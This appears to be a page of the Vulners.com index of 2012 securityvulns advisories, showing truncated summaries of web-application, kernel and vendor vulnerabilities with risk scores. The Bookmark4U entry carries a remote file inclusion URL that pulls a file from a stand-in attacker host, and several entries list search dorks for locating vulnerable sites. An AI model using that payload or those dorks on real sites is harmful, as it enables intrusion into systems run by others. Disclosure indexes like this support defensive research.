Securityvulns - Page 135 of Securityvulns Vulnerabilities List | Vulners.com

SecurityvulnsRecent

Recent Most viewed

47153 matches found

securityvulns•added 2012/07/11 12:0 a.m.•25 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.5CVSS1.6AI score0.38624EPSS

Exploits4References10Affected Software4

securityvulns•added 2012/07/11 12:0 a.m.•70 views

Arasism Remote Command Upload Vulnerability

Exploit Title : Arasism Remote Command Upload Vulnerability Author : Iranian Security & Research Team Discovered By : Ehram.shahmohamadi Home : sec-lab.ir Contact : research at sec-lab dot ir Portal Link : www.Arasism.Com Security Risk : High DorK : "Powered by Arasism.com"...

securityvulns•added 2012/07/11 12:0 a.m.•86 views

BookNux 0.2 <= Multiple Vulnerabilities

BookNux 0.2 = Multiple Vulnerabilities Discovered by: Jean Pascal Pereira [email protected] Vendor information: "Commentics is a free, advanced PHP comment script with many features. Professionally written and with open source code, its main aims are to be integrable, customizable and secure."...

securityvulns•added 2012/07/11 12:0 a.m.•100 views

PHP NUKE ALL VERSION MULTI VULNERABILITY

Exploit Title : PHP NUKE ALL VERSION MULTI VULNERABILITY Author : Iranian Security & Research Team Discovered By : Nafsh Home : sec-lab.ir Contact : research at sec-lab dot ir Date : 23/1/2012 - 19:30 Software Link : www.phpnuke.ir Security Risk : High...

securityvulns•added 2012/07/11 12:0 a.m.•100 views

Behsamanco CMS Editor Vulnerability

Exploit Title : Behsamanco CMS Editor Vulnerability Author : Iranian Security & Research Team Discovered By : R3dMind Home : sec-lab.ir Contact : research at sec-lab dot ir Software Link : www.behsamanco.com Security Risk : high Dork : inurl:".ir/Controls/TextEditor/"...

securityvulns•added 2012/07/11 12:0 a.m.•35 views

libpurple / Pidgin code execution

Code execution in MXit protocol...

7.5CVSS2.5AI score0.04706EPSS

Exploits2References1Affected Software1

securityvulns•added 2012/07/11 12:0 a.m.•49 views

[SECURITY] [DSA 2509-1] pidgin security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2509-1 [email protected] http://www.debian.org/security/ Luciano Bello July 08, 2012 http://www.debian.org/security/faq -...

7.5CVSS2.4AI score0.04706EPSS

securityvulns•added 2012/07/11 12:0 a.m.•83 views

NDTV Cross Site Scripting Vulnerabilitiy

Exploit Title : NDTV Cross Site Scripting Vulnerabilitiy Author : Iranian Security & Research Team Discovered By : zilli0o0n Home : sec-lab.ir Contact : research at sec-lab dot ir Software Link : www.ndtv.com DorK : "Copyright NDTV Convergence Limited 2012"...

securityvulns•added 2012/07/09 12:0 a.m.•28 views

Cyberoam DPI unsafe certificates

All devices use same certificates for SSL connection hijacking...

Exploits0References1

securityvulns•added 2012/07/09 12:0 a.m.•98 views

NGS00162 Patch Notification: Symantec Message Filter Session Hijacking via session fixation

High Risk Vulnerability in Symantec Message Filter 2 July 2012 Ben Williams of NCC Group has discovered a High risk vulnerability in Symantec Message Filter Impact: Session Hijacking via session fixation Versions affected: Symantec Message Filter Version 6.3 An updated version of the software has...

securityvulns•added 2012/07/09 12:0 a.m.•43 views

ZDI-12-106 : Avaya IP Office Customer Call Reporter ImageUpload Remote Code Execution Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ZDI-12-106 : Avaya IP Office Customer Call Reporter ImageUpload Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-106 June 28, 2012 - -- CVE ID: CVE-2012-3811 - -- CVSS: 9.7, AV:N/AC:L/Au:N/C:C/I:C/A:P - --...

10CVSS0.5AI score0.79047EPSS

securityvulns•added 2012/07/09 12:0 a.m.•29 views

Ubuntu AccountsService privilege escalation

Invalid files caching...

1.9CVSS4.1AI score0.00071EPSS

Exploits1References1Affected Software1

securityvulns•added 2012/07/09 12:0 a.m.•141 views

[SECURITY] [DSA 2504-1] libspring-2.5-java security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2504-1 [email protected] http://www.debian.org/security/ Florian Weimer June 28, 2012 http://www.debian.org/security/faq -...

7.5CVSS1AI score0.47611EPSS

securityvulns•added 2012/07/09 12:0 a.m.•26 views

Symantec Message Filter session hijacking

No description provided...

Exploits0References1Affected Software1

securityvulns•added 2012/07/09 12:0 a.m.•39 views

Microsoft IIS security vulnerabilities

Requests flood with sign in the path leads to server DoS; files and folders are accessible via 8.3 name making it easier to bruteforce names of hidden files and folders...

Exploits0References2

securityvulns•added 2012/07/09 12:0 a.m.•219 views

REWTERZ-20120629 - TEMENOS T24 Cross-Site Scripting (XSS) Vulnerability

Rewterz Security Research Group Advisory ======================================================== I. Overview ======================================================== A Cross-Site Scripting XSS vulnerability has been identified in TEMENOS T24 Core Banking Solution System. This vulnerability allow...

securityvulns•added 2012/07/09 12:0 a.m.•60 views

[SECURITY] [DSA 2503-1] bcfg2 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2503-1 [email protected] http://www.debian.org/security/ Florian Weimer June 28, 2012 http://www.debian.org/security/faq -...

9CVSS2.3AI score0.01624EPSS

securityvulns•added 2012/07/09 12:0 a.m.•48 views

.Net Framework Tilde Character DoS - Sorry, exploit-db link corrected

Link: http://soroush.secproject.com/downloadable/iistildedos.txt Exploit-db link: www.exploit-db.com/exploits/19575 ---------------------------- Security Research - .Net Framework Tilde Character DoS Website : http://soroush.secproject.com/blog/ I. BACKGROUND --------------------- "The .NET...

securityvulns•added 2012/07/09 12:0 a.m.•47 views

Spring Framework information leakage

No description provided...

7.5CVSS1.7AI score0.47611EPSS

Exploits1References1Affected Software1

securityvulns•added 2012/07/09 12:0 a.m.•69 views

Event Script PHP v1.1 CMS - Multiple Web Vulnerabilites

Title: ====== Event Script PHP v1.1 CMS - Multiple Web Vulnerabilites Date: ===== 2012-06-10 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=606 VL-ID: ===== 606 Common Vulnerability Scoring System: ==================================== 7 Introduction: ============= Even...

securityvulns•added 2012/07/09 12:0 a.m.•29 views

Avaya IP Office Customer Call Reporter code execution

It's possible to upload executable files via ImageUpload.ashx...

10CVSS3.4AI score0.79047EPSS

Exploits8References1Affected Software1

securityvulns•added 2012/07/09 12:0 a.m.•54 views

Linux kernel multiple security vulnerabilities

DoS, privilege escalation...

7.2CVSS2.7AI score0.00457EPSS

Exploits6References2Affected Software1

securityvulns•added 2012/07/09 12:0 a.m.•65 views

7sepehr SQL Injection Vulnerability

Exploit Title : 7sepehr SQL Injection Vulnerability Author : Iranian Security & Research Lab Discovered By : K0242 Home : sec-lab.ir Contact : research at sec-lab dot ir Portal Link : www.7sepehr.Com Security Risk : High DorK : "Powered by 7sepehr.com"...

securityvulns•added 2012/07/09 12:0 a.m.•76 views

[CVE-2012-0694] SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution

------------------------------------------------------- SugarCRM CE = 6.3.1 "unserialize" PHP Code Execution ------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13satgmaildotcom software link....: http://www.sugarcrm.com/ -...

1.2AI score0.83794EPSS

securityvulns•added 2012/07/09 12:0 a.m.•64 views

[USN-1488-1] Linux kernel vulnerabilities

========================================================================== Ubuntu Security Notice USN-1488-1 June 29, 2012 linux vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubun...

7.2CVSS0.2AI score0.00457EPSS

securityvulns•added 2012/07/09 12:0 a.m.•66 views

[USN-1473-1] Linux kernel vulnerabilities

========================================================================== Ubuntu Security Notice USN-1473-1 June 13, 2012 linux vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubun...

7.2CVSS0.7AI score0.00173EPSS

securityvulns•added 2012/07/09 12:0 a.m.•55 views

[ MDVSA-2012:101 ] libtiff

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2012:101 http://www.mandriva.com/security/ Package : libtiff Date : July 4, 2012 Affected: 2010.1, 2011., Enterprise Server 5.0 Problem Description: Multiple vulnerabilities has been discovered and corrected in...

7.5CVSS7.8AI score0.02978EPSS

securityvulns•added 2012/07/09 12:0 a.m.•59 views

libtiff library integer overflow

Integer overflow on tiff parsing...

7.5CVSS5.3AI score0.06846EPSS

Exploits0References2Affected Software1

securityvulns•added 2012/07/09 12:0 a.m.•61 views

CVE-2012-2380: Apache Roller Cross-Site-Resource-Forgery (XSRF) vulnerability

Severity: important Vendor: The Apache Software Foundation Versions Affected: Roller 4.0.0 to Roller 4.0.1 Roller 5.0 The unsupported Roller 3.1 release is also affected Description: HTTP POST interfaces in the Roller admin/editor console were not protected from CSRF attacks. This issue has been...

0.2AI score0.00249EPSS

securityvulns•added 2012/07/09 12:0 a.m.•133 views

Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI

vendor - http://bookmark4u.sourceforge.net/ version - 2.1 solution - product discontinued example - http://target/bookmark4u/lostpasswd.php?env5Bincludeprefix5D=http://attacker/path/to/file.txt???...

securityvulns•added 2012/07/09 12:0 a.m.•10745 views

GuestBook Scripts PHP v1.5 - Multiple Web Vulnerabilites

Title: ====== GuestBook Scripts PHP v1.5 - Multiple Web Vulnerabilites Date: ===== 2012-06-11 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=601 VL-ID: ===== 601 Common Vulnerability Scoring System: ==================================== 7.5 Introduction: =============...

securityvulns•added 2012/07/09 12:0 a.m.•39 views

XSS, Redirector and FPD vulnerabilities in WordPress

Hello 3APA3A! In June I've disclosed vulnerabilities in WordPress, which I'd present for you. They take place in plugin Akismet for WordPress and it's core-plugin since version WP 2.0, so these vulnerabilities concern WordPress itself. This is the first in series of advisories concerning...

securityvulns•added 2012/07/09 12:0 a.m.•115 views

7sepehr SQL Injection Vulnerability

Exploit Title : 7sepehr SQL Injection Vulnerability Author : Iranian Security & Research Team Discovered By : Ehram.shahmohamadi Home : sec-lab.ir Contact : research at sec-lab dot ir Portal Link : www.7sepehr.Com Security Risk : High DorK : "Powered by 7sepehr.com"...

securityvulns•added 2012/07/09 12:0 a.m.•96 views

Wordpress (editormonkey) Arbitrary File Upload Vulnerability

a bug in Wordpress editormonkeythat allows to us to occur a File Upload on a Remote machin. Exploit Title : Wordpress editormonkey Arbitrary File Upload Vulnerability Author : IrIsT.Ir Discovered By : Am!r Home : http://IrIsT.Ir/forum Software Link : http://wordpress.org Security Risk : High...

securityvulns•added 2012/07/09 12:0 a.m.•49 views

Cyberoam advisory

Vulnerability in Cyberoam DPI devices 30 Jun 2012 CVE-2012-3372 =================================================================== Cyberoam make a range of DPI devices http://www.cyberoamworks.com/ which are capable of intercepting SSL connections. In common with all such devices, in order to...

5.8CVSS0.5AI score0.00084EPSS

securityvulns•added 2012/07/09 12:0 a.m.•19 views

EMC RSA Access Manager replay attack

It's possible to replays sniffed session...

Exploits0References1Affected Software1

securityvulns•added 2012/07/09 12:0 a.m.•81 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.5CVSS1.6AI score0.83794EPSS

Exploits31References26Affected Software14

securityvulns•added 2012/07/09 12:0 a.m.•51 views

IBM Edge Components Caching Proxy XSS Followup

Rapid7 probably found this vulnerability on October 23 2002 http://seclists.org/fulldisclosure/2002/Oct/330 and its called CVE- 2002-1167 They don't show the output and specify it is error message but the injection method is the same. The update is it works on IBM Edge Components Caching Proxy -...

securityvulns•added 2012/07/09 12:0 a.m.•49 views

[security bulletin] HPSBPI02794 SSRT100542 rev.1 - Certain HP Photosmart Printers, Remote Denial of Service (DoS)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c02931414 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02931414 Version: 1 HPSBPI02794...

7.8CVSS0.3AI score0.04621EPSS

securityvulns•added 2012/07/09 12:0 a.m.•29 views

IBM Edge Components Caching Proxy crossite scripting

Crossite scripting on non-existent page...

6.8CVSS1.7AI score0.04408EPSS

Exploits0References1Affected Software1

securityvulns•added 2012/07/09 12:0 a.m.•96 views

7sepehr SQL Injection Vulnerability

Exploit Title : 7sepehr SQL Injection Vulnerability Author : Iranian security & Research Lab Discovered By : Ehram.shahmohamadi Home : sec-lab.ir Contact : research at sec-lab dot ir Portal Link : www.7sepehr.Com Security Risk : High DorK : "Powered by 7sepehr.com"...

securityvulns•added 2012/07/09 12:0 a.m.•61 views

NGS00194 Patch Notification: Nagios XI Network Monitor Blind SQL Injection

High Risk Vulnerability in Nagios XI Network Monitor 2 July 2012 Daniel Compton of NCC Group has discovered a High risk vulnerability in Nagios XI Network Monitor Impact: Nagios XI Network Monitor Blind SQL Injection Versions affected: Nagios XI Network Monitor 2011R1.9 An updated version of the...

securityvulns•added 2012/07/09 12:0 a.m.•65 views

SEC Consult SA-20120626-0 :: Zend Framework - Local file disclosure via XXE injection

SEC Consult Vulnerability Lab Security Advisory 20120626-0 ======================================================================= title: Local file disclosure via XXE injection product: Zend Framework vulnerable version: 1.11.11 1.12.0 RC1 2.0.0 beta4 and earlier versions / branches fixed versio...

securityvulns•added 2012/07/09 12:0 a.m.•82 views

[SECURITY] [DSA 2506-1] libapache-mod-security security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2506-1 [email protected] http://www.debian.org/security/ Yves-Alexis Perez July 02, 2012 http://www.debian.org/security/faq -...

4.3CVSS1.9AI score0.01943EPSS

securityvulns•added 2012/07/09 12:0 a.m.•35 views

ESA-2012-026: RSA Access Manager Session Replay Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2012-026: RSA Access Manager Session Replay Vulnerability EMC Identifier: ESA-2012-026 CVE Identifier: CVE-2012-2281 Severity Rating: CVSSv2 Base Score: 6. 8 AV:A/AC:H/Au:N/C:C/I:C/A:C Affected Products: RSA Access Manager Server version 6.0.x RSA...

6.8CVSS0.2AI score0.00326EPSS

securityvulns•added 2012/07/09 12:0 a.m.•64 views

Freeside SelfService CGI|API 2.3.3 - Multiple Vulnerabilities

Title: ====== Freeside SelfService CGI|API 2.3.3 - Multiple Vulnerabilities Date: ===== 2012-06-14 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=614 VL-ID: ===== 614 Common Vulnerability Scoring System: ==================================== 6.5 Introduction:...

securityvulns•added 2012/07/09 12:0 a.m.•336 views

IIS Short File/Folder Name Disclosure by using tilde ~ character

Link: http://soroush.secproject.com/downloadable/iistildeshortnamedisclosure.txt Exploit-db link: www.exploit-db.com/exploits/19525/ ---------------------------- Security Research - IIS Short File/Folder Name Disclosure Website : http://soroush.secproject.com/blog/ I. BACKGROUND...

securityvulns•added 2012/07/09 12:0 a.m.•37 views

HP Device Access Manager for Protect Tools Information Store ActiveX memory corruption

Buffer overflows in different methods...

7.5CVSS4.2AI score0.41759EPSS

Exploits1References3Affected Software2

securityvulns•added 2012/07/09 12:0 a.m.•60 views

Apache mod_security protection bypass

It's possible to bypass protection if both Content-Disposition: attachment and Content-Type: multipart are present...

5CVSS2AI score0.11456EPSS

Exploits3References1Affected Software1

securityvulns•added 2012/07/09 12:0 a.m.•48 views

Basilic RCE bug

Hi Dear Sir Basilic is an Automated Bibliography Server for Research Publications Diffusion that use by many research center. there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server. sample:...

Total number of security vulnerabilities47153